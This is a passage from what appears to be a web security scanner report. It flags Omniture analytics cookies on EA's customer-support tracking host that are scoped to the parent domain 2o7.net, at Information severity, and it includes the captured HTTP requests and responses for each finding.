Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:48:14 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:48:14 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:48:14 GMT
Last-Modified: Sat, 25 Jun 2011 13:48:14 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E04959E-3682-6FD6BEE2"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www337
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.19. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: s_vi_tprdbex7Ex7Ctcbtcgxxrt, set with Domain=.2o7.net by eacustomerservice.112.2o7.net, so it is sent to every host under 2o7.net. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727?[AQB]&ndh=1&t=24/5/2011%208%3A47%3A32%205%20300&ce=UTF-8&pageName=Support%20Home&g=http%3A//support.ea.com/&cc=USD&c1=Not%20Logged%20In&v8=aU84DuwUwY9gAhoN137mIdeb2MlklSkQKAUA_1uW_w4uKV9mqls6n6fRxH0x0NYUkUmialo2t8WgxRqvPN%7EF3ORX9u_4mKmEchm_Tu0t1DvdTRtxLfbbx5ltTw8s9D4UMa_uRcumg2x9NzthyDo%7EU%7Eihqm2dEGCf5UP50ehVCmce5Kj9V1rZC6PP4P2bZGCViFgvJMmYy6oXQBcQY3Yz%7EHv0U62RjTo2adFX6Vp02V3lm5rIQLUnvKHVfSwG5ttISZcxk4BKJF8cI%21&c10=aU84DuwUwY9gAhoN137mIdeb2MlklSkQKAUA_1uW_w4uKV9mqls6n6fRxH0x0NYUkUmialo2t8WgxRqvPN%7EF3ORX9u_4mKmEchm_Tu0t1DvdTRtxLfbbx5ltTw8s9D4UMa_uRcumg2x9NzthyDo%7EU%7Eihqm2dEGCf5UP50ehVCmce5Kj9V1rZC6PP4P2bZGCViFgvJMmYy6oXQBcQY3Yz%7EHv0U62RjTo2adFX6Vp02V3lm5rIQLUnvKHVfSwG5ttISZcxk4BKJF8cI%21&c15=EA%20Support&pid=Support%20Home&pidt=1&oid=javascript%3Avoid%28openPositionedWindow%28%27http%3A//www.info.ea.com%27%2C%2520%27info%27%2C%2520780%2C%2520800%2C%25200%2C%25200%2C%2520t&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:47:33 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:47:33 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:47:33 GMT
Last-Modified: Sat, 25 Jun 2011 13:47:33 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E049575-630B-08274CF4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www227
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.20. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: s_vi_tprdbex7Ex7Ctcbtcgxxrt, set with Domain=.2o7.net by eacustomerservice.112.2o7.net, so it is sent to every host under 2o7.net. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536?[AQB]&ndh=1&t=24/5/2011%208%3A50%3A20%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&pe=lnk_e&pev1=http%3A//twitter.com/askeasupport&pid=View%20Answer&pidt=1&oid=http%3A//twitter.com/askeasupport&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:50:21 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:50:21 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:50:21 GMT
Last-Modified: Sat, 25 Jun 2011 13:50:21 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E04961D-7167-1669492C"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www664
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.21. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: s_vi_tprdbex7Ex7Ctcbtcgxxrt, set with Domain=.2o7.net by eacustomerservice.112.2o7.net, so it is sent to every host under 2o7.net. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891?[AQB]&ndh=1&t=24/5/2011%208%3A47%3A41%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&events=event2&c1=Not%20Logged%20In&c2=4394%20Official%20EA%20Twitter%20Accounts&v2=4394%20Official%20EA%20Twitter%20Accounts&v8=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c10=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c15=EA%20Support&pid=Support%20Home&pidt=1&oid=http%3A//support.ea.com/app/answers/detail/a_id/4394&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:47:42 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:47:42 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:47:42 GMT
Last-Modified: Sat, 25 Jun 2011 13:47:42 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E04957E-289C-64EC62A2"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www227
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.22. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: s_vi_tprdbex7Ex7Ctcbtcgxxrt, set with Domain=.2o7.net by eacustomerservice.112.2o7.net, so it is sent to every host under 2o7.net. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639?[AQB]&ndh=1&t=24/5/2011%208%3A50%3A15%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&events=event2&c1=Not%20Logged%20In&c2=4394%20Official%20EA%20Twitter%20Accounts&v2=4394%20Official%20EA%20Twitter%20Accounts&v8=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c10=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c15=EA%20Support&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:50:15 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:50:15 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:50:15 GMT
Last-Modified: Sat, 25 Jun 2011 13:50:15 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E049617-7405-11B63051"
Vary: *
